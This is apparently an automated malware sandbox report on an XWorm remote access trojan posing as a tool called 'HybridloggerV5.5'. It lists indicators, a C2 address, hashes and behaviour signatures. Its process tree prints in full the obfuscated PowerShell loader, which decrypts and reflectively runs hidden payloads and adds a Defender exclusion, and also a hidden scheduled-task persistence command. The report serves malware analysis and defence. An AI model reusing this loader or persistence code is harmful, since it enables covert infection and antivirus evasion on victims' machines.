Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    123s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/02/2025, 05:14

General

  • Target

    HybridloggerV5.5.exe

  • Size

    937KB

  • MD5

    c9314841cdbf8522e9ee925039d3bfb7

  • SHA1

    1b851459626862fdae6bdc0dd30aadf7a0f905ee

  • SHA256

    9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7

  • SHA512

    fb6e8ed3ccae472e19b95f9a1a08968fea7a6457b8d30a35d5f49f466fdf34d321c4cc0d427e753a9063d88456277e8c1d592c5ec1413c96593938b4be778bd0

  • SSDEEP

    24576:61P4yldcwy+Q4sUTB95/MbGkR/ntFdHZknwaIZ1cSsDrM:YP4yj4+Q4sUTB95/MbGkfFdmnwanpM

Malware Config

Extracted

Family

xworm

C2

193.161.193.99:24469

Attributes
  • Install_directory

    %Temp%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe
    "C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1464
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:1548
        • C:\Windows\system32\findstr.exe
          findstr /C:"asd" banned_users.txt
          3⤵
            PID:2336
          • C:\Windows\system32\findstr.exe
            findstr /C:"asd asd" users.txt
            3⤵
              PID:920
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat" "
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2952
            • C:\Windows\system32\net.exe
              net file
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:548
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                4⤵
                  PID:2904
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                3⤵
                • Command and Scripting Interpreter: PowerShell
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:744
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_120_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_120.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4904
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_120.vbs"
                  4⤵
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:5020
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_120.bat" "
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4624
                    • C:\Windows\system32\net.exe
                      net file
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1352
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 file
                        7⤵
                          PID:4748
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Roaming\startup_str_120.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                        6⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2720

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              3KB

              MD5

              661739d384d9dfd807a089721202900b

              SHA1

              5b2c5d6a7122b4ce849dc98e79a7713038feac55

              SHA256

              70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

              SHA512

              81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              dbbf71e9fb59f80938f09809b160e441

              SHA1

              8b9a517d846cb9a0a284f77ed88328236a85055f

              SHA256

              e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1

              SHA512

              90b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840

            • C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat

              Filesize

              12KB

              MD5

              89a22d3791ca38666c8144725a74497d

              SHA1

              96b672089a3c783e4dd27e8da7c0cc1245d55cfd

              SHA256

              9326ad90526504bfbc876646087bf41a82128fd5d995f624b13ea7ef3e154b94

              SHA512

              6b73d4fde3a673be8ea4aa169382b8aed1577817193545666a18cc83e918a642adf464090f2c1938b0f75f322e8e18e5304bf15c8eda71b4c072aaea5c294b2e

            • C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat

              Filesize

              910KB

              MD5

              72ecd938d114e246eeebc8ae430fc2e9

              SHA1

              9ece59be22ceadcb3951093483cc69a76658801d

              SHA256

              4eafc8d12d2e402d7de955ffa3940c070d40dea9f2eda1260962518204304f65

              SHA512

              d2839e5226f9753f5098072b5cb7ab0f30318f3255355ae69fc75efc0ecfced89eb74788716b01a511e2461fa1c21052a336c1873aa82ef411cb710c4f14059e

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jyvgjkel.zfk.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\users.txt

              Filesize

              10B

              MD5

              bebbe3f3e6a9600be7982006daab2e95

              SHA1

              bc6ea02ee0160343925db6136ab1a76a314411bb

              SHA256

              afc1cd0ffdfd94078823c53c72714c91b21b5990d335ef5b2128f613ce3432e5

              SHA512

              872855b832566763b4d825e985cc518219d7b97d845aff07a76e05e454f707c3245f808515658ff56c879e50e58381ebdf6509681a0d9cf9b8c0147cbb3b6da1

            • C:\Users\Admin\AppData\Roaming\startup_str_120.vbs

              Filesize

              115B

              MD5

              38ecd8a0fb1393c7394095882a71f131

              SHA1

              f17201d2d2e00167e7786766b2da546b5e50c028

              SHA256

              1ea700303afd0e245e8342593f0da8c65ddad1509fd7b6e4401277079b227d61

              SHA512

              f377054e2b68b07d39bdf2c9d33ce0565b9b1dbddc3631af7a0d8624fd58df437c3671b507f4942a1a444de7edf86c4b7ab150f21f1807b064e358ebd3645573

            • memory/744-20-0x000002312D570000-0x000002312D592000-memory.dmp

              Filesize

              136KB

            • memory/744-21-0x0000023113370000-0x0000023113378000-memory.dmp

              Filesize

              32KB

            • memory/744-22-0x000002312D7C0000-0x000002312D7F8000-memory.dmp

              Filesize

              224KB

            • memory/1984-0-0x00007FFFB0C93000-0x00007FFFB0C95000-memory.dmp

              Filesize

              8KB

            • memory/1984-1-0x0000000000460000-0x0000000000550000-memory.dmp

              Filesize

              960KB

            • memory/2720-53-0x0000025E1BB60000-0x0000025E1BB76000-memory.dmp

              Filesize

              88KB